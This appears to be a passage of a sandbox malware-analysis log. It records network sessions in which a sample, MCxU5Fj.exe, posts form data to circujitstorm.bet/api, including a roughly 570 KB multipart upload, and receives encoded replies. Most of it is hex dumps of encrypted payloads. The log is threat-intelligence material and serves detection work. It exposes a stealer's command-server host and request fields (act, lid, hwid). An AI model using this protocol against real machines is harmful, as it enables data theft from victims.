2025-03-05 08:12:43 UTC	2471	OUT	Data Raw: 2d 2d 48 32 59 57 47 48 39 45 48 55 4c 33 5a 4c 55 31 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 48 32 59 57 47 48 39 45 48 55 4c 33 5a 4c 55 31 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 34 38 31 36 32 36 39 33 38 0d 0a 2d 2d 48 32 59 57 47 48 39 45 48 55 4c 33 5a 4c 55 31 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 32 59 57 47 48 39 45 48 55 4c 33 Data Ascii: --H2YWGH9EHUL3ZLU1ZWContent-Disposition: form-data; name="act"send_message--H2YWGH9EHUL3ZLU1ZWContent-Disposition: form-data; name="lid"yau6Na--7481626938--H2YWGH9EHUL3ZLU1ZWContent-Disposition: form-data; name="pid"1--H2YWGH9EHUL3
2025-03-05 08:12:44 UTC	821	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:12:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LFv26R%2Bm5VlqwU7inj6%2F9ZE9aHkH9yFdOvB4ZEPQQcQZLZkU6wFmvKtGy6OmzeZX3VRreVnnyFVZfpaA4Pv%2BP0%2FUs3ygvLfQi%2F7etmL4P1EHfJ2OUtulA2zaZmvHgkiiZmO73w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b82664eaa143a7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1562&rtt_var=603&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2843&recv_bytes=3478&delivery_rate=1789215&cwnd=172&unsent_bytes=0&cid=3f9e4ce01c73289e&ts=432&x=0"
2025-03-05 08:12:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-03-05 08:12:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49716	188.114.97.3	443	7528	C:\Users\user\Desktop\MCxU5Fj.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:12:44 UTC	366	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=F8JSRCQ9AZO Cookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 571841 Host: circujitstorm.bet
2025-03-05 08:12:44 UTC	15331	OUT	Data Raw: 2d 2d 46 38 4a 53 52 43 51 39 41 5a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 46 38 4a 53 52 43 51 39 41 5a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 34 38 31 36 32 36 39 33 38 0d 0a 2d 2d 46 38 4a 53 52 43 51 39 41 5a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 38 4a 53 52 43 51 39 41 5a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a Data Ascii: --F8JSRCQ9AZOContent-Disposition: form-data; name="act"send_message--F8JSRCQ9AZOContent-Disposition: form-data; name="lid"yau6Na--7481626938--F8JSRCQ9AZOContent-Disposition: form-data; name="pid"1--F8JSRCQ9AZOContent-Disposition:
2025-03-05 08:12:44 UTC	15331	OUT	Data Raw: 31 a3 f2 b3 74 d1 08 9f d1 c3 f0 43 bd d8 58 f1 07 45 dc 62 3c 18 47 b5 4f f1 7e 19 aa d2 0d 12 38 77 a4 88 57 21 22 2b 5e ff 86 09 a1 7f 7f 34 ec 27 31 2b 44 67 a0 da 27 d7 c5 fa 8a 86 23 19 22 44 35 dd 29 03 80 b1 3d 51 81 3b 4d a2 64 cc 1b 19 c6 44 d8 13 9e 27 5b ab d2 fb 96 cc e1 98 41 98 2d 24 b8 25 81 e9 43 c3 f1 dc 5b 91 1a 1f af 8f db c6 a9 8f 2b bd fc e2 c0 7c e6 60 cd b2 a7 4b c7 6d df f2 7b 3c 07 07 a5 9d b8 f1 a2 d6 0f 7c d7 2a 34 37 96 fe b8 cb ed 48 80 32 51 91 ac 30 12 2c 30 4d c9 d7 74 6d 20 75 60 2f 32 b2 fb fd 24 77 1a a5 cd 6f 58 70 0f 8d 45 6f d7 87 ed b3 34 c4 c2 b3 f8 12 4a f2 0a fb 4a 31 24 a9 f4 f5 55 cb 8b 66 6a 05 5f ac 7b fa 3d b9 3f 26 e7 eb 7e ad 3f 95 1e 8e 08 4d c4 ee 2a 2d 89 24 89 7e 45 68 82 01 f3 63 85 59 b4 da 3e 24 e9 Data Ascii: 1tCXEb<GO~8wW!"+^4'1+Dg'#"D5)=Q;MdD'[A-$%C[+\|`Km{<\|47H2Q0,0Mtm u`/2$woXpEo4JJ1$Ufj_{=?&~?M-$~EhcY>$
2025-03-05 08:12:44 UTC	15331	OUT	Data Raw: f0 0a d1 db f4 1f be a2 51 2f 4a 79 ef 7f 44 12 ba 3a d8 2f 1c 08 1e bd 9d 86 f3 07 32 d7 16 de 0c 57 f7 7e 50 25 35 1c d9 7d 87 dd 59 56 3b 9e 58 ed 55 54 35 bf 1e 32 ec 55 36 32 19 ce 5d c9 ac aa 5a d8 fc 10 e2 37 7b b4 8c fc e5 ef d7 10 e3 5d 00 f7 93 93 d6 4f b3 80 ff 7e 64 96 af 74 e8 ab c3 75 05 dc c5 f3 ac c1 cc c0 9d a1 2f 62 ce 1b 87 14 e4 a4 96 36 7f dc 5e a3 8f fe ab 26 6c e2 fc f5 f5 46 86 e8 d8 f2 7d 87 ea f9 6f e1 ac b1 a7 82 35 1d bf d7 4c fe a4 f0 ad 86 d3 51 c5 2c d2 9e 1b 49 7b e8 5d fe 2a b7 af 0f 0b 5b 19 73 4a 1c aa ee be 1b 2a b9 f9 cf 10 7b bd aa 9e 3f 87 a5 1c 36 1a f9 d5 c3 c0 a2 bc 23 f2 c1 7e ef a0 20 d8 af 71 f2 d9 0e 23 ef 4f fb 30 30 b7 6a 1f e3 4c 7e 9c c7 3e 06 f9 cc 71 10 ea f5 ab b0 be ee 9d e0 d4 07 0c 90 fc 2a 8c 15 8a Data Ascii: Q/JyD:/2W~P%5}YV;XUT52U62]Z7{]O~dtu/b6^&lF}o5LQ,I{][sJ{?6#~ q#O00jL~>q*
2025-03-05 08:12:44 UTC	15331	OUT	Data Raw: 1d e0 c3 7f 69 f3 4f fa aa d7 37 be e4 c6 31 05 ac 0b 91 ac 8a b9 57 8e c9 62 e2 7d 11 9b 24 dd b4 94 ea 4a 19 cf 86 de 80 a2 66 e8 5f e6 c4 9f 2d b0 d4 67 f9 14 46 9b f1 b3 09 87 01 66 dd 9f d1 74 cf ad d3 87 1b 79 e7 bf a2 22 ad 9f ef 90 7c 31 03 80 67 a7 e2 0c e6 2b 27 eb 9e ff e6 b2 fe 9b c8 e9 d3 be a5 94 ac 8d 6e da 65 bd f1 9e 96 d1 17 92 be e7 c2 e0 cf ab f1 6c 18 e2 96 8c e2 3c 56 dd 8e e9 c0 bb b8 e0 c9 57 17 cc 0c 56 64 6d 47 ed a8 0e 8e 96 38 1b 15 90 cc 5d f6 34 5d bb f7 85 fa 93 35 90 67 4a 9f 7b 54 bc 73 77 ff d7 21 fb ed 00 fd 9d c2 12 30 9c f8 19 49 a2 29 d0 8c f8 81 2e 3f 14 cd 0b 26 ca b3 35 d0 dd 3c cc 59 04 50 42 52 f0 d7 a4 8e 27 f3 57 65 4a 00 4d 38 02 02 3d 42 e7 8a 79 a0 1c fe 76 34 42 08 08 08 c3 fe b7 b3 b8 48 ad c0 0e 9d ed 61 Data Ascii: iO71Wb}$Jf_-gFfty"\|1g+'nel<VWVdmG8]4]5gJ{Tsw!0I).?&5<YPBR'WeJM8=Byv4BHa
2025-03-05 08:12:44 UTC	15331	OUT	Data Raw: 9b 66 bb 25 86 7f 5d 4a 52 c7 f4 69 88 03 97 a7 52 a7 af 82 29 d6 0e 4f fd 03 6d dd c4 16 f3 2b 54 f5 0b 35 06 d5 46 ad 8c 95 88 d6 ff 6d 5d 47 70 dd b5 cc 38 15 1e a1 52 75 3a 13 03 b2 ca 11 6f fe 9f 50 fd 7f 72 b6 01 9c 66 66 4b 11 01 73 18 70 0d 3d 35 62 2f 09 35 bd dc ee fa c5 09 58 c0 01 39 86 84 ec 86 1d 4b 04 08 dd ce 57 85 82 94 e0 74 e1 15 03 40 46 84 89 82 03 5d 77 80 69 77 7d 30 86 ad 86 6a 39 e5 6f 54 38 d4 32 87 ff 67 12 d5 8b 3e 3a d4 2a 5e 80 8c 79 25 41 fe 60 06 e1 e4 33 ea 42 8c be cb 05 bd 9e cd 77 17 c5 11 65 c8 69 5a 6c 2b ae d7 51 38 79 d0 30 a5 3a 56 e9 86 e8 14 4a c0 82 48 45 6c 1e 5e 6a a7 23 88 ec 8b 3e d6 9b b3 1f 37 c3 75 b9 3b 6b 15 54 d8 14 10 2b 39 89 9b 7b fd 90 cd d6 88 a3 c3 b7 f8 8b 82 c6 d1 85 ef bc 12 0a 1d e2 56 66 f4 Data Ascii: f%]JRiR)Om+T5Fm]Gp8Ru:oPrffKsp=5b/5X9KWt@F]wiw}0j9oT82g>:*^y%A`3BweiZl+Q8y0:VJHEl^j#>7u;kT+9{Vf
2025-03-05 08:12:44 UTC	15331	OUT	Data Raw: 0c 36 77 99 bb 06 07 9f d0 b2 84 34 2d 49 10 94 3f 97 fb df 3a bb 7e bb 66 5e e1 32 b8 e3 f7 8c cf 77 64 1c e6 8f f4 bf 33 13 05 00 e0 08 03 8d 44 28 14 30 d7 a7 a6 1e 8c a4 9d 87 f3 c3 eb b0 27 94 1b 9d b7 7b 20 ae 7a ff 61 03 b0 86 cd 53 e0 d5 1f 23 37 87 28 02 e0 d5 52 1b 92 ae c0 a2 a7 84 fe 2a 3d 60 80 9d 0a d0 40 42 bc 88 43 08 13 2a fd 1e 93 7b 9a 10 13 59 ed fb a5 55 e0 85 be b7 e4 cd 96 91 bf 6f d8 b1 aa 3a 0e 39 0a 0b d7 3f d7 bb 55 7a fd 0d 44 1e df b8 bc 47 06 68 df 1c 9a f8 07 b3 f1 15 62 94 55 1f c3 31 04 c7 74 30 42 d0 42 a3 50 af e4 4f 59 7a e3 9e 4b 67 72 b1 be 85 05 35 04 fe 39 38 3e b1 4c 47 34 bc be 0d b6 cb 46 e5 21 b2 fa e2 41 6c e7 5f c9 c9 5f 41 76 20 78 63 4a 2a 1a 78 c5 38 0b c8 79 f8 2b a9 02 f4 f6 d0 cf fa e0 5d a3 f1 8e 53 36 Data Ascii: 6w4-I?:~f^2wd3D(0'{ zaS#7(R=`@BC{YUo:9?UzDGhbU1t0BBPOYzKgr598>LG4F!Al__Av xcJ*x8y+]S6
2025-03-05 08:12:44 UTC	15331	OUT	Data Raw: b5 ee b8 cf da be 16 33 15 c9 4d 40 ad c8 7d 29 db cd 86 83 a0 4e 2d a6 54 bf 80 f7 24 d7 6f 4f 31 36 a4 75 fe 0b 5d 90 91 54 cc c5 a2 14 ed 78 10 07 25 eb 6b 1f 42 64 76 01 db 25 75 cb 03 62 18 18 7f 36 dc de 94 50 69 f5 5c 1c fe 2c 90 c6 fa ed ca fa fd 4f 5d cd b3 08 ee 66 ce f6 24 47 e9 8d 6b 8d 22 c7 2c 98 a5 b0 70 64 63 8f 35 db 3c 7e 31 9c d5 96 b8 a3 1e 43 51 1f 62 50 19 84 f1 c6 bf df be f8 f5 c2 86 6e f7 0a d6 7d e6 35 ee 32 b2 ff 94 ba d1 ea 0c 7d 99 f5 cf 6e a9 01 aa 2a 43 07 3b d5 c3 03 6a 96 bf ff f4 bc 79 29 c4 d2 8a 50 14 b7 59 81 89 9a 7f a3 7a fa fe 89 3b f3 4e 7d 9e 7e b9 3d 4f 5b 04 02 e8 be 37 95 02 f1 da e2 b2 6b 4a 7b 51 f8 e8 d5 c2 47 15 a8 ec 2b 41 8c d1 63 6a 61 bd df 05 bd d5 fe 98 e4 51 3b ed 5e 77 50 c4 4f 0b 79 8e f0 e1 88 aa Data Ascii: 3M@})N-T$oO16u]Tx%kBdv%ub6Pi\,O]f$Gk",pdc5<~1CQbPn}52}n*C;jy)PYz;N}~=O[7kJ{QG+AcjaQ;^wPOy
2025-03-05 08:12:44 UTC	15331	OUT	Data Raw: 4e 5b 99 3b 34 39 a7 c3 dc 3d fc 6d f5 28 3f 67 c8 64 e6 58 fd 4d 76 35 29 58 f0 dd 76 90 2e a1 0e 1d 6b 02 e0 a8 0e 98 ee dc 59 11 07 91 9c 63 5e 7b b0 7a de 4c 02 b4 8c a8 d0 6a ee df a7 3d 10 35 0d ff ce dd a7 92 5a 20 e1 ba f5 c5 23 d7 1a 64 bc 4c ef 6f 91 68 11 ab 6f 66 8a 8b 53 44 56 8e 67 17 f6 55 36 3c 2f 2c fe 69 8d 60 4a a3 32 3e 37 b0 fe 13 82 87 a3 e1 13 a2 c0 8e fd 01 12 3c a9 a8 d2 03 48 d0 29 05 9a 4d 7b ed 36 27 49 46 42 54 72 8b 05 60 be ba 3f 18 f4 b5 ae 12 a6 48 27 04 20 e0 44 ce 8b 27 35 3e dc ab 18 be 8f b4 d3 18 32 e8 f6 c6 59 90 ae 89 bb 8c 81 84 81 0c 4f 03 68 e9 af 3f c4 32 dc 1c 0f c0 c3 fa 43 4c 2f 89 c7 95 65 92 40 88 e9 28 4d 67 a2 9b f4 11 4c 06 6f 0d 73 f6 12 fb f2 5e c6 7e de 39 f2 e6 c9 f5 3c 70 ac 87 3e c1 f3 4e f8 91 a2 Data Ascii: N[;49=m(?gdXMv5)Xv.kYc^{zLj=5Z #dLohofSDVgU6</,i`J2>7<H)M{6'IFBTr`?H' D'5>2YOh?2CL/e@(MgLos^~9<p>N
2025-03-05 08:12:44 UTC	15331	OUT	Data Raw: e4 29 c4 85 76 b9 6c bc 9f 7b 19 64 b4 2b d5 06 1d f6 b2 49 77 8c 3b 98 91 6a 9f 19 b9 5f b6 d9 56 ef 49 f5 53 4c bf 92 0a 1c 00 1d fc eb 1f dd 28 62 b6 ea 30 f3 2c e2 ef 2b 98 e4 79 46 3a 3b 97 85 f7 f6 81 7e ad 16 26 21 eb d0 d8 ec 5c e0 e0 1c d5 85 68 7e 40 9f 14 aa 97 70 68 43 50 94 17 4c 73 88 29 89 0a af bf 10 e6 46 45 29 c6 7c e9 d5 b7 7f c9 5f a3 34 dc 86 b0 c2 42 31 27 1c 86 aa 5e 3e c1 b7 f0 ea 94 29 6e 45 46 f2 1d e7 c3 7a 65 a8 aa cc ac 83 61 46 fc d6 16 f0 8c b1 a3 e7 ed c4 f8 70 78 f5 c9 1f ba 51 a4 0e 16 2a 96 f1 62 89 8b 05 c5 32 a5 c2 eb 67 2d a8 aa e8 6b 08 4a f3 8a c0 33 49 ae 6a 90 50 dc ba b7 2b 13 f4 82 00 01 ee 3b 6d 41 b9 1f db ce 6a da 45 22 3d 82 f5 71 cd ab da 4c 55 35 95 9c ac ab 63 3f 65 dd 5b 96 d4 e5 db c3 82 fa b3 f6 03 ef Data Ascii: )vl{d+Iw;j_VISL(b0,+yF:;~&!\h~@phCPLs)FE)\|_4B1'^>)nEFzeaFpxQ*b2g-kJ3IjP+;mAjE"=qLU5c?e[
2025-03-05 08:12:44 UTC	15331	OUT	Data Raw: 05 49 9b 30 24 cc d1 02 f5 a1 33 c3 d5 cd 10 15 87 48 c6 f0 5c df cd 4f b5 7c 5d 98 f7 1d e4 0f f5 2e 0e f8 79 86 cf f5 ae 56 ed 3d ad 15 34 fb 99 ec 37 8b a1 0f 99 73 62 b2 4e 35 d2 e9 7e af fc d9 dc bb fe 6c 9e c1 d8 ac 2e 85 a5 4e fc 4f 6d 60 2f f1 0b 7a 9c ed 03 f1 69 62 94 71 88 d5 6d 43 9e 32 9f ff 50 58 fa 3b d8 7d 5c fc e3 c4 fa 1b 14 70 1b 1e 1c 60 5f 07 f2 a4 ec ea c8 99 c6 d9 0d 47 fa 50 7f 38 ab 9d 85 40 81 70 ff e5 85 6b 1b 11 ee b7 81 5e 29 10 14 04 ee c3 9e 93 08 78 60 a7 0b 3c f0 07 cc 1f 16 b8 85 c7 55 57 6b 1d 0b e7 24 40 64 b9 0c 58 21 f0 fb 76 ce 0a 82 7e d4 6a cc 52 ca fc dc 03 cf c7 7e f6 66 cb f7 9c 2b 6f 14 97 37 59 31 23 9d 13 3f 5c 04 86 67 08 b4 27 80 75 3f 1a 76 de 05 32 f6 38 fc ef b8 58 e7 36 30 2d 8b 10 04 4e 4e 8f 25 4a 5f Data Ascii: I0$3H\O\|].yV=47sbN5~l.NOm`/zibqmC2PX;}\p`_GP8@pk^)x`<UWk$@dX!v~jR~f+o7Y1#?\g'u?v28X60-NN%J_
2025-03-05 08:12:55 UTC	825	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:12:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDoGdLH3EszB3xeolrwyBZXaAwXkckwRTgEhoNhVsY2vRUV0wtUVe%2FVBoUC%2FZGa9ToCiTEAJw0gOSdTPTciqjILaFAWMmrmUU6Y711tb9qhDYCW8CBjld%2BOAXUbG4RtKxcmNyg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b8266d1aaf4261-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1682&rtt_var=639&sent=200&recv=590&lost=0&retrans=0&sent_bytes=2844&recv_bytes=574471&delivery_rate=1699650&cwnd=243&unsent_bytes=0&cid=254f908a37e278ad&ts=11041&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49720	188.114.97.3	443	7528	C:\Users\user\Desktop\MCxU5Fj.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:12:56 UTC	354	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: circujitstorm.bet
2025-03-05 08:12:56 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 37 34 38 31 36 32 36 39 33 38 26 6a 3d 26 68 77 69 64 3d 45 45 30 41 37 41 32 36 33 39 35 44 30 37 35 43 31 44 45 30 34 33 33 36 38 42 41 37 41 39 45 33 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--7481626938&j=&hwid=EE0A7A26395D075C1DE043368BA7A9E3
2025-03-05 08:12:56 UTC	823	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:12:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GhsWZfYUoHt9kSWsBNJCfos%2BBQrPy4XmA8L5dNQjIgJwxE7Gb2OtNyKTTkHEcH7gS9rx78xk%2BAjwecKvegx6r5DqYBqulTxd0r83vIGGTS3Y%2BEwjfZlCgM%2FIC%2F5kPiS4FJ0%2BIA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b826b54ed749c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1630&rtt_var=642&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1077&delivery_rate=1665715&cwnd=227&unsent_bytes=0&cid=354620b0b47a543e&ts=457&x=0"
2025-03-05 08:12:56 UTC	546	IN	Data Raw: 64 37 66 0d 0a 48 51 4a 4d 62 30 48 47 35 78 63 47 53 69 53 54 66 41 73 77 70 7a 2f 6d 54 53 49 59 32 51 64 73 37 51 6c 79 66 4c 74 63 4b 33 74 47 65 57 34 4a 4e 65 54 64 4a 69 70 6f 51 62 46 47 4f 68 79 46 57 38 52 33 41 48 79 73 56 78 69 49 57 42 51 78 33 54 68 43 51 69 6c 6e 46 53 30 6d 67 4b 42 30 54 58 4a 4f 38 52 45 35 59 74 56 6d 71 51 74 68 61 71 41 30 43 5a 38 35 41 53 43 55 4c 31 35 4c 4b 6e 63 57 4f 58 53 45 6c 47 38 2f 65 47 6a 39 46 44 35 58 34 48 36 7a 46 31 56 71 6f 45 6b 5a 6a 31 4d 31 43 4e 78 6f 66 6a 64 72 54 69 68 5a 4e 35 57 64 50 48 39 39 66 50 45 57 50 47 6a 4d 64 35 77 46 45 55 47 76 59 69 53 41 53 43 73 2b 36 54 4a 6f 44 56 51 77 65 52 73 71 70 39 56 54 62 68 74 56 71 77 67 34 51 5a 39 46 74 6e 70 75 62 4c 78 58 46 4c 56 74 42 52 Data Ascii: d7fHQJMb0HG5xcGSiSTfAswpz/mTSIY2Qds7QlyfLtcK3tGeW4JNeTdJipoQbFGOhyFW8R3AHysVxiIWBQx3ThCQilnFS0mgKB0TXJO8RE5YtVmqQthaqA0CZ85ASCUL15LKncWOXSElG8/eGj9FD5X4H6zF1VqoEkZj1M1CNxofjdrTihZN5WdPH99fPEWPGjMd5wFEUGvYiSASCs+6TJoDVQweRsqp9VTbhtVqwg4QZ9FtnpubLxXFLVtBR
2025-03-05 08:12:56 UTC	1369	IN	Data Raw: 6b 39 66 74 48 38 58 4e 4e 59 64 63 54 6c 50 62 41 38 5a 43 50 54 53 59 32 30 72 46 74 63 55 57 6c 69 58 62 39 55 38 47 79 75 4a 4d 43 43 5a 62 51 63 73 7a 7a 6c 36 48 56 42 6b 4b 41 5a 34 38 6f 4a 4f 52 43 31 69 31 42 39 41 43 4d 31 64 69 33 39 77 61 6f 42 49 4b 71 35 37 51 45 2f 65 4c 6c 4d 32 51 53 30 2f 47 6e 44 30 30 7a 77 33 66 32 61 72 42 44 49 43 36 77 79 4f 65 45 56 66 6d 46 49 32 6d 6e 73 4c 4d 73 34 2b 63 54 78 70 5a 58 67 36 43 72 43 72 63 7a 41 38 64 2b 6c 58 63 67 66 2f 58 59 78 36 65 6e 4f 52 66 53 54 65 55 41 51 5a 38 7a 46 71 49 6c 39 51 49 69 77 33 74 63 78 64 63 69 46 38 6f 54 68 6a 59 64 59 48 6b 6e 35 54 49 5a 56 58 57 36 46 39 46 67 6e 72 4b 45 34 71 65 30 38 71 43 79 6a 2f 30 33 4a 66 43 45 50 56 4f 32 68 37 6a 46 36 51 45 51 31 77 Data Ascii: k9ftH8XNNYdcTlPbA8ZCPTSY20rFtcUWliXb9U8GyuJMCCZbQcszzl6HVBkKAZ48oJORC1i1B9ACM1di39waoBIKq57QE/eLlM2QS0/GnD00zw3f2arBDIC6wyOeEVfmFI2mnsLMs4+cTxpZXg6CrCrczA8d+lXcgf/XYx6enORfSTeUAQZ8zFqIl9QIiw3tcxdciF8oThjYdYHkn5TIZVXW6F9FgnrKE4qe08qCyj/03JfCEPVO2h7jF6QEQ1w
2025-03-05 08:12:56 UTC	1369	IN	Data Raw: 63 2b 4b 68 66 7a 4a 6d 4e 49 52 48 51 70 4a 79 79 48 76 6c 56 55 4a 47 66 6c 4e 54 6b 46 30 31 53 48 66 32 5a 77 69 48 5a 55 6d 54 6f 44 52 66 63 4d 48 44 64 70 53 33 73 73 64 34 72 54 52 6d 45 75 63 75 55 2b 63 31 50 2b 66 6f 78 30 63 47 75 53 50 77 61 50 65 41 49 77 33 41 52 50 50 58 56 77 4e 6c 34 58 6f 59 39 6b 5a 54 6c 53 6f 52 67 7a 61 64 52 5a 76 79 78 4e 65 75 42 31 49 4d 5a 51 46 54 76 36 43 58 45 4d 62 32 30 34 48 79 71 31 76 55 51 31 65 47 33 48 48 6a 6b 48 39 45 6d 53 44 6c 4e 66 6f 32 6b 4f 6c 32 67 2b 46 2f 49 50 5a 54 64 45 64 43 6b 6f 44 49 4b 76 4c 6b 4d 35 5a 66 6b 31 63 6b 69 52 56 4c 77 43 63 43 79 49 64 6c 53 5a 58 30 41 58 32 53 74 67 48 6e 46 55 4b 54 39 34 6d 73 68 61 59 41 34 50 78 54 38 79 42 4d 4a 65 72 78 77 62 63 72 5a 44 56 Data Ascii: c+KhfzJmNIRHQpJyyHvlVUJGflNTkF01SHf2ZwiHZUmToDRfcMHDdpS3ssd4rTRmEucuU+c1P+fox0cGuSPwaPeAIw3ARPPXVwNl4XoY9kZTlSoRgzadRZvyxNeuB1IMZQFTv6CXEMb204Hyq1vUQ1eG3HHjkH9EmSDlNfo2kOl2g+F/IPZTdEdCkoDIKvLkM5Zfk1ckiRVLwCcCyIdlSZX0AX2StgHnFUKT94mshaYA4PxT8yBMJerxwbcrZDV
2025-03-05 08:12:56 UTC	178	IN	Data Raw: 70 38 6a 56 4a 48 32 64 6a 4f 68 30 4b 37 64 39 75 58 79 6c 4a 78 55 78 48 58 76 31 6e 71 44 6c 58 55 4c 52 67 42 37 39 74 43 45 2b 4e 4f 57 5a 4d 57 6d 4d 67 4a 58 69 76 6a 32 5a 4a 4a 57 7a 36 4c 6b 4e 33 6b 41 36 45 4f 78 4e 32 71 6d 49 39 69 30 51 52 44 49 70 76 53 6a 52 79 62 67 38 58 63 2f 4b 75 4c 32 4d 76 63 62 68 4f 62 46 6e 39 52 74 34 59 62 46 4b 42 58 53 65 6e 51 79 59 2b 38 42 5a 4b 45 6e 78 54 4c 53 73 4b 68 61 31 74 5a 78 78 54 2b 69 74 62 42 64 64 31 71 42 6c 77 55 34 77 7a 49 35 56 68 52 69 6e 79 4d 52 67 0d 0a Data Ascii: p8jVJH2djOh0K7d9uXylJxUxHXv1nqDlXULRgB79tCE+NOWZMWmMgJXivj2ZJJWz6LkN3kA6EOxN2qmI9i0QRDIpvSjRybg8Xc/KuL2MvcbhObFn9Rt4YbFKBXSenQyY+8BZKEnxTLSsKha1tZxxT+itbBdd1qBlwU4wzI5VhRinyMRg
2025-03-05 08:12:56 UTC	1369	IN	Data Raw: 32 39 33 39 0d 0a 76 53 6c 73 65 4c 41 57 2f 30 45 52 42 65 46 4c 6a 4e 47 31 39 2f 6e 61 49 48 55 74 41 71 47 38 70 71 57 67 5a 50 65 64 7a 59 78 6c 4c 54 69 6b 4f 4c 49 4b 50 52 6e 63 49 53 39 55 2f 55 58 6a 67 43 4e 51 69 53 6d 32 68 5a 67 6a 5a 50 55 6f 37 69 6d 30 62 47 6d 31 4c 49 42 38 48 38 72 35 4e 50 69 52 47 2f 6c 63 35 57 4a 46 73 72 79 5a 4e 58 4a 4e 6d 48 74 31 36 4c 6c 50 49 4b 52 73 71 52 45 41 6f 4a 69 4b 61 79 45 31 2f 4b 41 2b 6b 46 6c 46 54 37 48 79 6f 4e 55 77 74 72 31 4d 35 76 6e 6b 46 54 50 77 30 47 51 4a 36 54 79 41 65 4e 35 57 64 50 48 39 39 64 74 45 62 54 58 58 58 52 64 63 6a 61 47 37 67 63 69 4b 42 66 68 30 31 69 42 74 4f 4d 43 52 4d 46 43 55 79 70 34 70 54 62 67 42 76 30 67 56 63 51 5a 35 7a 74 6e 70 75 62 50 49 78 42 5a 38 77 Data Ascii: 